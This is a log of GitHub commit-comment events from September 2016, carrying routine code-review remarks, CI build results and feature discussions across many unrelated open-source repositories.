{"id":"4560412314","type":"CommitCommentEvent","actor":{"login":"Daniel-dk"},"repo":{"name":"geolink/opentracker"},"payload":{"comment":{"id":19014065,"position":null,"line":null,"path":null,"commit_id":"def3fb8bae307c41dd8fb86d08fc6d4ed9b479c7","created_at":"2016-09-14T07:56:49Z","updated_at":"2016-09-14T07:56:49Z","body":"We've added an accelerometer for motion detection and logging and are also checking GPS speed periodically to determine if the vehicle is moving ( some newer vehicle manufacturers don't like when you attach to their loom to sense ignition ) \r\n\r\ninstallers suggested we try to sense ignition by monitoring fluctuations on the vehicle battery line ( been messing around with dueTimer to get \"deterministic\" ADC samples ) -some of teh existing indusrty players have resorted to this - but it doesn't work on hybrid or EV :( - so motion sense hysteresis is the default.\r\n"}},"created_at":"2016-09-14T07:56:49Z"}
{"id":"4560416230","type":"CommitCommentEvent","actor":{"login":"panyuzhu"},"repo":{"name":"panyuzhu/20160914"},"payload":{"comment":{"id":19014076,"position":1,"line":1,"path":"README.md","commit_id":"2983d2fd1177c74a7e6e8e76d5a7b01dc2bdf3d1","created_at":"2016-09-14T07:57:43Z","updated_at":"2016-09-14T07:57:43Z","body":"hehe"}},"created_at":"2016-09-14T07:57:43Z"}
{"id":"4560416663","type":"CommitCommentEvent","actor":{"login":"dingxu"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19014077,"position":736,"line":736,"path":"shishuo/line-monitoring-map.js","commit_id":"10e74a705b7aff8eda20a018ac621a6f6de22964","created_at":"2016-09-14T07:57:49Z","updated_at":"2016-09-14T07:57:49Z","body":"为啥不拼好了字符串，一次性渲染，你这样页面得重绘多少次？而且，每次都得重新查找'.ui-top-bar-view'这个元素\r\n\r\n```\r\nthis.$mod.find( '.ui-top-bar-view' ).append($.map(topBarData.submit_info.current_wave_info, function ( wave ) {\r\n    return  T.compile( tpls.topBar )( _this.monitoringModel.gatherTopBarData( wave , topBarData ) );\r\n});\r\n```"}},"created_at":"2016-09-14T07:57:49Z"}
{"id":"4560420162","type":"CommitCommentEvent","actor":{"login":"lotem"},"repo":{"name":"rime/librime"},"payload":{"comment":{"id":19014088,"position":28,"line":28,"path":"src/gear/charset_translator.cc","commit_id":"5c5b87c18680b3dd45c9efa1196ea4b4cdefd910","created_at":"2016-09-14T07:58:40Z","updated_at":"2016-09-14T07:58:40Z","body":"No need to override this function."}},"created_at":"2016-09-14T07:58:40Z"}
{"id":"4560421841","type":"CommitCommentEvent","actor":{"login":"lotem"},"repo":{"name":"rime/librime"},"payload":{"comment":{"id":19014092,"position":23,"line":23,"path":"src/gear/charset_translator.cc","commit_id":"5c5b87c18680b3dd45c9efa1196ea4b4cdefd910","created_at":"2016-09-14T07:59:09Z","updated_at":"2016-09-14T07:59:09Z","body":"This class is not necessary. Use `UniqueTranslation` directly?"}},"created_at":"2016-09-14T07:59:09Z"}
{"id":"4560428544","type":"CommitCommentEvent","actor":{"login":"aserratorta"},"repo":{"name":"Flexible-User-Experience/Espai-Kowo"},"payload":{"comment":{"id":19014106,"position":null,"line":null,"path":null,"commit_id":"12efab4cb980ecddb6a95c6bc3829a16b54b2ba3","created_at":"2016-09-14T08:00:42Z","updated_at":"2016-09-14T08:00:42Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;8u5byEvQ&#x2F;51-add-recaptcha\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Add reCaptcha</a>"}},"created_at":"2016-09-14T08:00:42Z"}
{"id":"4560434203","type":"CommitCommentEvent","actor":{"login":"lotem"},"repo":{"name":"rime/librime"},"payload":{"comment":{"id":19014114,"position":8,"line":8,"path":"src/gear/charset_translator.cc","commit_id":"5c5b87c18680b3dd45c9efa1196ea4b4cdefd910","created_at":"2016-09-14T08:02:05Z","updated_at":"2016-09-14T08:02:05Z","body":"Need more work:\r\nFind/write a cross-platform replacement."}},"created_at":"2016-09-14T08:02:05Z"}
{"id":"4560435787","type":"CommitCommentEvent","actor":{"login":"vobruba-martin"},"repo":{"name":"google/closure-compiler"},"payload":{"comment":{"id":19014122,"position":null,"line":null,"path":null,"commit_id":"1f3bc9ae979f3076b06eee2c8f87796ed6fd3607","created_at":"2016-09-14T08:02:30Z","updated_at":"2016-09-14T08:02:30Z","body":"ReadableStream is supported in Chrome 52+ and Opera 39+. WritableStream is still in development."}},"created_at":"2016-09-14T08:02:30Z"}
{"id":"4560436998","type":"CommitCommentEvent","actor":{"login":"stefan-kolb"},"repo":{"name":"JabRef/jabref"},"payload":{"comment":{"id":19014124,"position":null,"line":null,"path":null,"commit_id":"d10fbbe9cdbb226da6bf6b752b3a6c6de95cf748","created_at":"2016-09-14T08:02:48Z","updated_at":"2016-09-14T08:02:48Z","body":"I do this at the release sometimes. Exactly like @oscargus said."}},"created_at":"2016-09-14T08:02:48Z"}
{"id":"4560437819","type":"CommitCommentEvent","actor":{"login":"TechQuery"},"repo":{"name":"sentsin/layui"},"payload":{"comment":{"id":19014125,"position":null,"line":null,"path":null,"commit_id":"e9d0e1bdb3f4de1ad26ad3e077e2944469155f5a","created_at":"2016-09-14T08:02:59Z","updated_at":"2016-09-14T08:02:59Z","body":"希望@sentsin 大神能说说对这套 **jQuery 抽象视图接口**的意见、建议，若能和大神一起完善这个 **jQuery 插件通用底层库**，形成类似 require.js **AMD 规范**的东西，想必可以造福 **jQuery 生态圈**~"}},"created_at":"2016-09-14T08:02:59Z"}
{"id":"4560439605","type":"CommitCommentEvent","actor":{"login":"maziminke"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19014129,"position":null,"line":null,"path":null,"commit_id":"154e026fbe6e53037e46a8c30f2b837459235acc","created_at":"2016-09-14T08:03:26Z","updated_at":"2016-09-14T08:03:26Z","body":"Can we have that fix for 2.06LTS as well please!?"}},"created_at":"2016-09-14T08:03:26Z"}
{"id":"4560440048","type":"CommitCommentEvent","actor":{"login":"korli"},"repo":{"name":"haikuports/haikuports"},"payload":{"comment":{"id":19014131,"position":16,"line":21,"path":"media-libs/libpng/libpng16-1.6.25.recipe","commit_id":"19fc7bdc83faf29666d0bf8f3800f4503adedae5","created_at":"2016-09-14T08:03:32Z","updated_at":"2016-09-14T08:03:32Z","body":"Seems like a typo."}},"created_at":"2016-09-14T08:03:32Z"}
{"id":"4560440715","type":"CommitCommentEvent","actor":{"login":"korli"},"repo":{"name":"haikuports/haikuports"},"payload":{"comment":{"id":19014135,"position":26,"line":35,"path":"media-libs/libpng/libpng16-1.6.25.recipe","commit_id":"19fc7bdc83faf29666d0bf8f3800f4503adedae5","created_at":"2016-09-14T08:03:42Z","updated_at":"2016-09-14T08:03:42Z","body":"Ditto."}},"created_at":"2016-09-14T08:03:42Z"}
{"id":"4560442167","type":"CommitCommentEvent","actor":{"login":"antespi"},"repo":{"name":"OCA/social"},"payload":{"comment":{"id":19014141,"position":null,"line":null,"path":null,"commit_id":"ee76f1adcbf4d3a07f764f22442a79245e766088","created_at":"2016-09-14T08:04:03Z","updated_at":"2016-09-14T08:04:03Z","body":"Because v9 implements an CSRF validation on any HTTP request. In this case, Mailgun connects to Odoo via HTTP GET with no csrf-token. This flags disables CSRF validation, this addon implements a HTTP validation using mailgun.apikey system parameters."}},"created_at":"2016-09-14T08:04:03Z"}
{"id":"4560442701","type":"CommitCommentEvent","actor":{"login":"vobruba-martin"},"repo":{"name":"google/closure-compiler"},"payload":{"comment":{"id":19014143,"position":null,"line":null,"path":null,"commit_id":"1f3bc9ae979f3076b06eee2c8f87796ed6fd3607","created_at":"2016-09-14T08:04:12Z","updated_at":"2016-09-14T08:04:12Z","body":"https://www.chromestatus.com/feature/6605041225957376\r\nhttps://www.chromestatus.com/feature/4531143755956224"}},"created_at":"2016-09-14T08:04:12Z"}
{"id":"4560443880","type":"CommitCommentEvent","actor":{"login":"bubnenkoff"},"repo":{"name":"putaolabs/hunt"},"payload":{"comment":{"id":19014147,"position":null,"line":null,"path":null,"commit_id":"d331e8422a10eaebb4c5d519d1a66d095e34838b","created_at":"2016-09-14T08:04:25Z","updated_at":"2016-09-14T08:04:25Z","body":"you could use very good lib named dini instead own https://github.com/robik/DIni"}},"created_at":"2016-09-14T08:04:25Z"}
{"id":"4560447849","type":"CommitCommentEvent","actor":{"login":"cyberblast"},"repo":{"name":"ScreepsGamers/screeps.behaviour-action-pattern"},"payload":{"comment":{"id":19014160,"position":null,"line":null,"path":null,"commit_id":"b4fe13e90d05c215d9188ae94b0bbc60236ba931","created_at":"2016-09-14T08:05:15Z","updated_at":"2016-09-14T08:05:15Z","body":"Contains a bug :/ \r\nWill have a look at it..."}},"created_at":"2016-09-14T08:05:15Z"}
{"id":"4560448182","type":"CommitCommentEvent","actor":{"login":"mehtank"},"repo":{"name":"mehtank/sumosims"},"payload":{"comment":{"id":19014163,"position":null,"line":null,"path":null,"commit_id":"6c936e93784ce75979262bdfcdd7069eb0c3cdbe","created_at":"2016-09-14T08:05:19Z","updated_at":"2016-09-14T08:05:19Z","body":"Fixes issue #15 "}},"created_at":"2016-09-14T08:05:19Z"}
{"id":"4560449594","type":"CommitCommentEvent","actor":{"login":"jaccokrijnen"},"repo":{"name":"leksah/leksah"},"payload":{"comment":{"id":19014165,"position":null,"line":null,"path":null,"commit_id":"ec00591ac70e82de2c76ca03767cedc667a09065","created_at":"2016-09-14T08:05:31Z","updated_at":"2016-09-14T08:05:31Z","body":"Thank, I forgot to update that. Why do we actually have a .lkshp file when it could be generated the first time?"}},"created_at":"2016-09-14T08:05:31Z"}
{"id":"4560449736","type":"CommitCommentEvent","actor":{"login":"INT2MAIN"},"repo":{"name":"INT2MAIN/learnGit"},"payload":{"comment":{"id":19014166,"position":5,"line":3,"path":"README.md","commit_id":"b15b860fa3ef0ca74395493992be3e5113b7b026","created_at":"2016-09-14T08:05:33Z","updated_at":"2016-09-14T08:05:33Z","body":"right"}},"created_at":"2016-09-14T08:05:33Z"}
{"id":"4560450284","type":"CommitCommentEvent","actor":{"login":"bubnenkoff"},"repo":{"name":"putaolabs/hunt"},"payload":{"comment":{"id":19014170,"position":null,"line":null,"path":null,"commit_id":"d331e8422a10eaebb4c5d519d1a66d095e34838b","created_at":"2016-09-14T08:05:40Z","updated_at":"2016-09-14T08:05:40Z","body":"Our use dub native config format https://sdlang.org/"}},"created_at":"2016-09-14T08:05:40Z"}
{"id":"4560452564","type":"CommitCommentEvent","actor":{"login":"fnoks"},"repo":{"name":"h5p/h5p-editor-url-field"},"payload":{"comment":{"id":19014173,"position":null,"line":null,"path":null,"commit_id":"f748ea2e9e333e8a1ba4ca1e4cc8128cc3284fb3","created_at":"2016-09-14T08:06:16Z","updated_at":"2016-09-14T08:06:16Z","body":"I think a UI component never should be responsible for attaching itself to a parent. I.e, returning HTML or a reference to a dom element is a better approach than the current appendTo-way. Getting a reference to the parent should not be necessary and might lead to unexpected problems. E.g the component might update the parent's attributes, delete siblings and so on."}},"created_at":"2016-09-14T08:06:16Z"}
{"id":"4560453814","type":"CommitCommentEvent","actor":{"login":"ceriottm"},"repo":{"name":"epfl-cosmo/i-pi-dev"},"payload":{"comment":{"id":19014176,"position":null,"line":null,"path":null,"commit_id":"61270a30fa61fa4e7b52e11acbdda3e26b600839","created_at":"2016-09-14T08:06:33Z","updated_at":"2016-09-14T08:06:33Z","body":"I also think this branch will do -- there are already a few speed\nimprovements in this branch I'd like to merge ASAP, and this tiny extra\nfeature of\na timer was intended to replace some hacky timing calls that I had\nincluded.\nOf course I do not intend to keep speed-tweaking in this branch before a\nmerge has happened, but really I feel that until we have chopped off as\nmany\nmessy feature branches as possible it makes little sense to switch to\nmicro-pull-requests (that of course should be good target to aim at).\nMy 2 cents.\n\nAs for the timer, Ondrej, are you doing this any differently? I think it\nwould help to put developments on a shared branch just as they're started,\nto avoid\nduplication of efforts.\n\n\nOn 14 September 2016 at 09:44, Riccardo Petraglia <notifications@github.com>\nwrote:\n\n> Hello,\n> any idea/code/comment is welcome...\n> I do not see the need of a new branch... but as you prefer...\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/epfl-cosmo/i-pi-dev/commit/61270a30fa61fa4e7b52e11acbdda3e26b600839#commitcomment-19013942>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABESZzQ6j4vA5JwYx4v-dgev54KJOox5ks5qp6XxgaJpZM4J7seE>\n> .\n>\n"}},"created_at":"2016-09-14T08:06:33Z"}
{"id":"4560455503","type":"CommitCommentEvent","actor":{"login":"pedrobaeza"},"repo":{"name":"OCA/social"},"payload":{"comment":{"id":19014177,"position":null,"line":null,"path":null,"commit_id":"ee76f1adcbf4d3a07f764f22442a79245e766088","created_at":"2016-09-14T08:07:00Z","updated_at":"2016-09-14T08:07:00Z","body":"But can this be a security hole?"}},"created_at":"2016-09-14T08:07:00Z"}
{"id":"4560455613","type":"CommitCommentEvent","actor":{"login":"ikkez"},"repo":{"name":"bcosca/fatfree-core"},"payload":{"comment":{"id":19014178,"position":null,"line":null,"path":null,"commit_id":"ce75d0a72c9c9896290cf5a6d2c57fb01232f89b","created_at":"2016-09-14T08:07:01Z","updated_at":"2016-09-14T08:07:01Z","body":"@bcosca I'm for reverting this change."}},"created_at":"2016-09-14T08:07:01Z"}
{"id":"4560458403","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19014183,"position":null,"line":null,"path":null,"commit_id":"18ba828728c0fdea5ff74379f2ca91fef5172cb0","created_at":"2016-09-14T08:07:40Z","updated_at":"2016-09-14T08:07:40Z","body":"input_processor_refactor (mbadams5) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1192 of 1211 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-18ba828728c0fdea5ff74379f2ca91fef5172cb0-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-18ba828728c0fdea5ff74379f2ca91fef5172cb0-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-98.43%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-18ba828728c0fdea5ff74379f2ca91fef5172cb0-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-31.96%25-green.svg)</a>\n"}},"created_at":"2016-09-14T08:07:40Z"}
{"id":"4560460153","type":"CommitCommentEvent","actor":{"login":"phistuck"},"repo":{"name":"google/closure-compiler"},"payload":{"comment":{"id":19014187,"position":null,"line":null,"path":null,"commit_id":"1f3bc9ae979f3076b06eee2c8f87796ed6fd3607","created_at":"2016-09-14T08:08:02Z","updated_at":"2016-09-14T08:08:02Z","body":"Yes, but this is one small API, you have many APIs here that are not supported. Most of those externs are unsupported by any browser, if I understand correctly. This misleads developers and it is generally not the usual process in Closure Compiler (first a browser ships, then externs are added).\r\nIt might be better to move every currently globally unsupported API to the `contrib` externs folder."}},"created_at":"2016-09-14T08:08:02Z"}
{"id":"4560461047","type":"CommitCommentEvent","actor":{"login":"RichiH"},"repo":{"name":"prometheus/snmp_exporter"},"payload":{"comment":{"id":19014188,"position":69,"line":347,"path":"main.go","commit_id":"fb67884e0462b912cf5500ed17814eff60056641","created_at":"2016-09-14T08:08:16Z","updated_at":"2016-09-14T08:08:16Z","body":"There might be others in the future and the cost is negligible, but I won't argue the point (too much) either way. Would you accept a patch?"}},"created_at":"2016-09-14T08:08:16Z"}
{"id":"4560463291","type":"CommitCommentEvent","actor":{"login":"victor-dogaru"},"repo":{"name":"drforr/blogs-perl-org"},"payload":{"comment":{"id":19014193,"position":null,"line":null,"path":null,"commit_id":"d2c233db1f9515fbc3a980da3bb2fa566efde5f5","created_at":"2016-09-14T08:08:45Z","updated_at":"2016-09-14T08:08:45Z","body":"I meant to say either `forgot two dots` or `forgot to introduce two dots` :)"}},"created_at":"2016-09-14T08:08:45Z"}
{"id":"4560464930","type":"CommitCommentEvent","actor":{"login":"rikterbeek"},"repo":{"name":"Adyen/adyen-magento"},"payload":{"comment":{"id":19014197,"position":83,"line":83,"path":"app/code/community/Adyen/Payment/Block/ApplePay.php","commit_id":"aa5051d5370452d241429433dedcc12f5626c8cd","created_at":"2016-09-14T08:09:05Z","updated_at":"2016-09-14T08:09:05Z","body":"Will change it so it will retrieve it from the registry"}},"created_at":"2016-09-14T08:09:05Z"}
{"id":"4560465960","type":"CommitCommentEvent","actor":{"login":"hhravn"},"repo":{"name":"exponentjs/ex-navigation"},"payload":{"comment":{"id":19014198,"position":null,"line":null,"path":null,"commit_id":"ba3140429dcb86a81a08e45d421919b5bdccb043","created_at":"2016-09-14T08:09:20Z","updated_at":"2016-09-14T08:09:20Z","body":"Fixes #49 , right?"}},"created_at":"2016-09-14T08:09:20Z"}
{"id":"4560467911","type":"CommitCommentEvent","actor":{"login":"spocke"},"repo":{"name":"tinymce/tinymce"},"payload":{"comment":{"id":19014199,"position":5,"line":5,"path":"tests/tinymce/text/Zwsp.js","commit_id":"1696e387e818d9c3f4e2e2d8871f0218208a0212","created_at":"2016-09-14T08:09:49Z","updated_at":"2016-09-14T08:09:49Z","body":"It's used as a word separator in the Kamer language. So basically we trimmed their spaces. :)"}},"created_at":"2016-09-14T08:09:49Z"}
{"id":"4560470453","type":"CommitCommentEvent","actor":{"login":"lxXSpitfireXxl"},"repo":{"name":"MrNukealizer/SCII-External-Maphack"},"payload":{"comment":{"id":19014204,"position":null,"line":null,"path":null,"commit_id":"9c83bd63067157d3595769a4eea789a14dc8d4f3","created_at":"2016-09-14T08:10:26Z","updated_at":"2016-09-14T08:10:26Z","body":"Hi MrNukealizer,\r\ni need a new Uptade of this tool.\r\nWork further on an update"}},"created_at":"2016-09-14T08:10:26Z"}
{"id":"4560475018","type":"CommitCommentEvent","actor":{"login":"MomentXie"},"repo":{"name":"thanhleviet/knox"},"payload":{"comment":{"id":19014218,"position":null,"line":null,"path":null,"commit_id":"5d278e5c8623d9f25081f0110a45ded9e202cf66","created_at":"2016-09-14T08:11:30Z","updated_at":"2016-09-14T08:11:30Z","body":"Thanks for your updates. But the function of \"knox_mc\" still has something wrong, which results of “p_value” are always display “0”. (No matter what to change the \"perm\" or dataset). Looking forward to your feedback."}},"created_at":"2016-09-14T08:11:30Z"}
{"id":"4560476066","type":"CommitCommentEvent","actor":{"login":"axelchalon"},"repo":{"name":"jolocom/little-sister"},"payload":{"comment":{"id":19014224,"position":4,"line":34,"path":"src/js/lib/agents/acl.js","commit_id":"6fa4509078095f69de925b059c927401ac7da9d9","created_at":"2016-09-14T08:11:46Z","updated_at":"2016-09-14T08:11:46Z","body":"Yeah I think you're right, but then this behaviour is the same as what would happen if we did not have this catch."}},"created_at":"2016-09-14T08:11:46Z"}
{"id":"4560478998","type":"CommitCommentEvent","actor":{"login":"bdejong"},"repo":{"name":"MTG/freesound"},"payload":{"comment":{"id":19014231,"position":41,"line":59,"path":"support/views.py","commit_id":"b2d01aa06cb4a1ccb6b50bc788ac19a97bee1ed7","created_at":"2016-09-14T08:12:29Z","updated_at":"2016-09-14T08:12:29Z","body":"Sure, but they totally depend on Zendesk... I.e. these are not constants but variables created when you create a new \"custom field\""}},"created_at":"2016-09-14T08:12:29Z"}
{"id":"4560479693","type":"CommitCommentEvent","actor":{"login":"attilagyongyosi"},"repo":{"name":"schonherz-java-ee-2016-summer/Band"},"payload":{"comment":{"id":19014233,"position":14,"line":46,"path":"band-web/src/main/java/hu/schonherz/training/band/managedbeans/view/BandImageUploadMB.java","commit_id":"6f06c6ff96f3d98aa45d95c51902057c7ca7a1b7","created_at":"2016-09-14T08:12:38Z","updated_at":"2016-09-14T08:12:38Z","body":":D I didn't mean to change the name of the `Logger`, I meant you should log `Exception`s properly."}},"created_at":"2016-09-14T08:12:38Z"}
{"id":"4560479975","type":"CommitCommentEvent","actor":{"login":"attilagyongyosi"},"repo":{"name":"schonherz-java-ee-2016-summer/Band"},"payload":{"comment":{"id":19014236,"position":23,"line":60,"path":"band-web/src/main/java/hu/schonherz/training/band/managedbeans/view/BandImageUploadMB.java","commit_id":"6f06c6ff96f3d98aa45d95c51902057c7ca7a1b7","created_at":"2016-09-14T08:12:42Z","updated_at":"2016-09-14T08:12:42Z","body":":D I didn't mean to change the name of the `Logger`, I meant you should log `Exception`s properly."}},"created_at":"2016-09-14T08:12:42Z"}
{"id":"4560480612","type":"CommitCommentEvent","actor":{"login":"dingxu"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19014239,"position":62,"line":62,"path":"shishuo/line-monitoring-model.js","commit_id":"10e74a705b7aff8eda20a018ac621a6f6de22964","created_at":"2016-09-14T08:12:51Z","updated_at":"2016-09-14T08:12:51Z","body":"model的方法为什么叫做check什么什么，而且返回的东西也不对"}},"created_at":"2016-09-14T08:12:51Z"}
{"id":"4560481552","type":"CommitCommentEvent","actor":{"login":"Exulansis"},"repo":{"name":"jolocom/little-sister"},"payload":{"comment":{"id":19014241,"position":4,"line":34,"path":"src/js/lib/agents/acl.js","commit_id":"6fa4509078095f69de925b059c927401ac7da9d9","created_at":"2016-09-14T08:13:05Z","updated_at":"2016-09-14T08:13:05Z","body":"True, that's kind of silly. I will remove it. Thanks ^_^\r\nI also changed the get request to a head one, for some weird reason I retained the memory that the proxy doesn't do head requests yet :D "}},"created_at":"2016-09-14T08:13:05Z"}
{"id":"4560484340","type":"CommitCommentEvent","actor":{"login":"bdejong"},"repo":{"name":"MTG/freesound"},"payload":{"comment":{"id":19014248,"position":27,"line":45,"path":"support/views.py","commit_id":"b2d01aa06cb4a1ccb6b50bc788ac19a97bee1ed7","created_at":"2016-09-14T08:13:42Z","updated_at":"2016-09-14T08:13:42Z","body":"Perhaps it would be better to split off the mailing function as well. I.e. make a email_to_support( ) function that does kind of the same as the zendesk one. That way the view would be much cleaner and less if/else/then stuff in there."}},"created_at":"2016-09-14T08:13:42Z"}
{"id":"4560485440","type":"CommitCommentEvent","actor":{"login":"fnoks"},"repo":{"name":"h5p/h5p-editor-interactive-video"},"payload":{"comment":{"id":19014250,"position":null,"line":null,"path":null,"commit_id":"d9547ac4bd3204da49a30d76b34b4d34da22b12d","created_at":"2016-09-14T08:13:55Z","updated_at":"2016-09-14T08:13:55Z","body":"Try the following: \r\n\r\n1. Resize your browser, so the editor becomes i.e 500px wide\r\n2. Add a textbox as poster, and make it use 100% width and height\r\n3. Resize the browser window, so it becomes i.e 800px wide.\r\n\r\nYou should now see what I see, i.e. the textbox does not scale, and will no longer use 100% width and height "}},"created_at":"2016-09-14T08:13:55Z"}
{"id":"4560486974","type":"CommitCommentEvent","actor":{"login":"xws-bench"},"repo":{"name":"xws-bench/bench"},"payload":{"comment":{"id":19014252,"position":8,"line":1128,"path":"src/units.js","commit_id":"1e6eaaed230732d7110fd66ad906c047f873ce78","created_at":"2016-09-14T08:14:17Z","updated_at":"2016-09-14T08:14:17Z","body":"This is just a performance issue rewriting (better use integer indices than push)"}},"created_at":"2016-09-14T08:14:17Z"}
{"id":"4560487302","type":"CommitCommentEvent","actor":{"login":"MTK4355"},"repo":{"name":"Ar1i/PokemonGo-Bot"},"payload":{"comment":{"id":19014253,"position":null,"line":null,"path":null,"commit_id":"597d85fdfb70a923981452696a98d2734c431a86","created_at":"2016-09-14T08:14:20Z","updated_at":"2016-09-14T08:14:20Z","body":"Done"}},"created_at":"2016-09-14T08:14:20Z"}
{"id":"4560487950","type":"CommitCommentEvent","actor":{"login":"dingxu"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19014257,"position":96,"line":96,"path":"shishuo/line-monitoring-model.js","commit_id":"10e74a705b7aff8eda20a018ac621a6f6de22964","created_at":"2016-09-14T08:14:29Z","updated_at":"2016-09-14T08:14:29Z","body":"setter和getter的定义区分不出来，有的明明是setter，却有返回值，有的明明是getter，却啥都不返回."}},"created_at":"2016-09-14T08:14:29Z"}
{"id":"4560489512","type":"CommitCommentEvent","actor":{"login":"drforr"},"repo":{"name":"drforr/blogs-perl-org"},"payload":{"comment":{"id":19014262,"position":null,"line":null,"path":null,"commit_id":"d2c233db1f9515fbc3a980da3bb2fa566efde5f5","created_at":"2016-09-14T08:14:51Z","updated_at":"2016-09-14T08:14:51Z","body":"git commit --amend may help here :) Also, I notice that Microsoft SmartQuotes(tm) are creeping into the HTML."}},"created_at":"2016-09-14T08:14:51Z"}
{"id":"4560490392","type":"CommitCommentEvent","actor":{"login":"brian-brazil"},"repo":{"name":"prometheus/snmp_exporter"},"payload":{"comment":{"id":19014264,"position":69,"line":347,"path":"main.go","commit_id":"fb67884e0462b912cf5500ed17814eff60056641","created_at":"2016-09-14T08:15:04Z","updated_at":"2016-09-14T08:15:04Z","body":"The thing is with many time series there's a good chance that a user wouldn't catch them of all in their dashboards/alerts, and so miss a problem. By having one big bucket of \"your url parameters are wrong\" that's less likely to happen.\r\n\r\nhttps://prometheus.io/docs/practices/instrumentation/#logging"}},"created_at":"2016-09-14T08:15:04Z"}
{"id":"4560490460","type":"CommitCommentEvent","actor":{"login":"xws-bench"},"repo":{"name":"xws-bench/bench"},"payload":{"comment":{"id":19014265,"position":29,"line":1230,"path":"src/units.js","commit_id":"1e6eaaed230732d7110fd66ad906c047f873ce78","created_at":"2016-09-14T08:15:06Z","updated_at":"2016-09-14T08:15:06Z","body":"This was a real issue, yes. getocollisions does not return a boolean, as fastgetocollisions do. It returns an object. This has been corrected in later version."}},"created_at":"2016-09-14T08:15:06Z"}
{"id":"4560491712","type":"CommitCommentEvent","actor":{"login":"dingxu"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19014267,"position":119,"line":119,"path":"shishuo/line-monitoring-model.js","commit_id":"10e74a705b7aff8eda20a018ac621a6f6de22964","created_at":"2016-09-14T08:15:23Z","updated_at":"2016-09-14T08:15:23Z","body":"这样并不能确认orderList是个数组"}},"created_at":"2016-09-14T08:15:23Z"}
{"id":"4560493520","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19014275,"position":null,"line":null,"path":null,"commit_id":"7b0d95bb42ad31e6b09d6e906283e9069b9340e5","created_at":"2016-09-14T08:15:45Z","updated_at":"2016-09-14T08:15:45Z","body":"Related to: backdrop/backdrop-issues#1568 "}},"created_at":"2016-09-14T08:15:45Z"}
{"id":"4560498143","type":"CommitCommentEvent","actor":{"login":"ader1990"},"repo":{"name":"cosminmocan/heat-templates"},"payload":{"comment":{"id":19014290,"position":390,"line":175,"path":"hot/Windows/MSSQLServer/MSSQL.psm1","commit_id":"3204a3570995a370cfb25ffeec7ad69ccb0cbdc3","created_at":"2016-09-14T08:16:52Z","updated_at":"2016-09-14T08:16:52Z","body":"use the driveletter that you already have, there is no need for the $iso object"}},"created_at":"2016-09-14T08:16:52Z"}
{"id":"4560501400","type":"CommitCommentEvent","actor":{"login":"ader1990"},"repo":{"name":"cosminmocan/heat-templates"},"payload":{"comment":{"id":19014299,"position":358,"line":143,"path":"hot/Windows/MSSQLServer/MSSQL.psm1","commit_id":"3204a3570995a370cfb25ffeec7ad69ccb0cbdc3","created_at":"2016-09-14T08:17:37Z","updated_at":"2016-09-14T08:17:37Z","body":"set constraints on the parameter: mandatory and string"}},"created_at":"2016-09-14T08:17:37Z"}
{"id":"4560502334","type":"CommitCommentEvent","actor":{"login":"panyuzhu"},"repo":{"name":"panyuzhu/20160914"},"payload":{"comment":{"id":19014301,"position":null,"line":null,"path":null,"commit_id":"50d1380a4499fbec117ec11943732037346b33a6","created_at":"2016-09-14T08:17:50Z","updated_at":"2016-09-14T08:17:50Z","body":"“添加一部分”"}},"created_at":"2016-09-14T08:17:50Z"}
{"id":"4560503006","type":"CommitCommentEvent","actor":{"login":"iTiaNex"},"repo":{"name":"iTiaNex/PrestaShop"},"payload":{"comment":{"id":19014302,"position":null,"line":null,"path":null,"commit_id":"36701caa2644735b56dc93dc4e491887d897cba1","created_at":"2016-09-14T08:17:58Z","updated_at":"2016-09-14T08:17:58Z","body":"it's not the right way"}},"created_at":"2016-09-14T08:17:58Z"}
{"id":"4560503834","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19014304,"position":null,"line":null,"path":null,"commit_id":"9a003450c5004390539a38295c751f693a3ea6a3","created_at":"2016-09-14T08:18:10Z","updated_at":"2016-09-14T08:18:10Z","body":"Related to: backdrop/backdrop-issues#1568 "}},"created_at":"2016-09-14T08:18:10Z"}
{"id":"4560503881","type":"CommitCommentEvent","actor":{"login":"rikterbeek"},"repo":{"name":"Adyen/adyen-magento"},"payload":{"comment":{"id":19014305,"position":204,"line":204,"path":"app/code/community/Adyen/Payment/Block/ApplePay.php","commit_id":"aa5051d5370452d241429433dedcc12f5626c8cd","created_at":"2016-09-14T08:18:10Z","updated_at":"2016-09-14T08:18:10Z","body":"Thought it was needed but you are right changed it."}},"created_at":"2016-09-14T08:18:10Z"}
